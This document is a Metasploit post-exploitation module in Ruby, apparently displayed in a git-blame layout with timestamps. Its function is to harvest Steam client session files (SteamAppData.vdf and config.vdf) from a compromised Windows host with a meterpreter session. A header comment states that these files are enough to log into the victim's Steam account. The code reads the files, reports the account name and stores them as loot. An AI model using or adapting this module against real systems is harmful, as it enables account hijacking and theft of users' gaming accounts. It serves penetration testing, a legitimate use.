2012-12-09 00:11:57 +00:00
|
|
|
##
|
|
|
|
# $Id: steam.rb
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# All that is needed to login to another Steam account is config.vdf,
|
|
|
|
# setting the AutoLoginUser to the proper username and RememberPassword
|
|
|
|
# to 1 in SteamAppData.vdf.
|
|
|
|
# Only tested on Win7 x64
|
|
|
|
#
|
|
|
|
# config.vdf , ContentCache element holds a K,V table of what appears
|
|
|
|
# to be UniqueID, Session. This is purely speculation as I have not
|
|
|
|
# reversed it to check. However the key is always unique to the account
|
|
|
|
# and the value changes whenever the account is logged out and then
|
|
|
|
# back in.
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/post/file'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
2012-12-12 04:41:50 +00:00
|
|
|
include Msf::Auxiliary::Report
|
2012-12-09 00:11:57 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info(info,
|
|
|
|
'Name' => 'Steam client session Collector.',
|
|
|
|
'Description' => %q{ This module will collect Steam session information from an
|
|
|
|
account set to autologin. },
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['Nikolai Rusakov <nikolai.rusakov[at]gmail.com>'],
|
|
|
|
'Platform' => ['win'],
|
|
|
|
'SessionTypes' => ['meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2012-12-12 04:41:50 +00:00
|
|
|
drive = expand_path('%SystemDrive%')
|
2012-12-09 00:11:57 +00:00
|
|
|
steamappdata = 'SteamAppData.vdf'
|
|
|
|
steamconfig = 'config.vdf'
|
|
|
|
u_rx = /AutoLoginUser\W*\"(.*)\"/
|
|
|
|
|
2012-12-12 04:41:50 +00:00
|
|
|
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
|
|
|
|
# the correct program files folder.
|
|
|
|
# We will just use an x64 only defined env variable to check.
|
|
|
|
if not expand_path('%ProgramFiles(X86)%').empty?
|
|
|
|
progs = drive + '\\Program Files (x86)' #x64
|
|
|
|
else
|
|
|
|
progs = drive + '\\Program Files' #x86
|
2012-12-09 00:11:57 +00:00
|
|
|
end
|
2012-12-12 04:41:50 +00:00
|
|
|
path = progs + '\\Steam\\config\\'
|
2012-12-09 00:11:57 +00:00
|
|
|
|
2012-12-12 04:41:50 +00:00
|
|
|
print_status("Checking for Steam configs in #{path}")
|
2012-12-09 00:11:57 +00:00
|
|
|
|
2012-12-12 04:41:50 +00:00
|
|
|
# Check if all the files are there.
|
|
|
|
# I know the path[0..-2] is ugly but directory? does not permit trailing slashes.
|
|
|
|
if directory?(path[0..-2]) && file?(path+steamappdata) && file?(path+steamconfig)
|
|
|
|
print_status("Located steam config files.")
|
|
|
|
sad = read_file(path+steamappdata)
|
|
|
|
if sad =~ /RememberPassword\W*\"1\"/
|
|
|
|
print_status("RememberPassword is set! Accountname is #{u_rx.match(sad)[1]}")
|
|
|
|
scd = read_file(path+steamconfig)
|
|
|
|
store_loot('steam.config', 'text/plain', session, sad, filename=steamappdata)
|
|
|
|
store_loot('steam.config', 'text/plain', session, scd, filename=steamconfig)
|
|
|
|
print_status("Steam configs harvested successfully!")
|
|
|
|
else
|
|
|
|
print_error("RememberPassword is not set, exiting.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error("Steam configs not found.")
|
2012-12-09 00:11:57 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|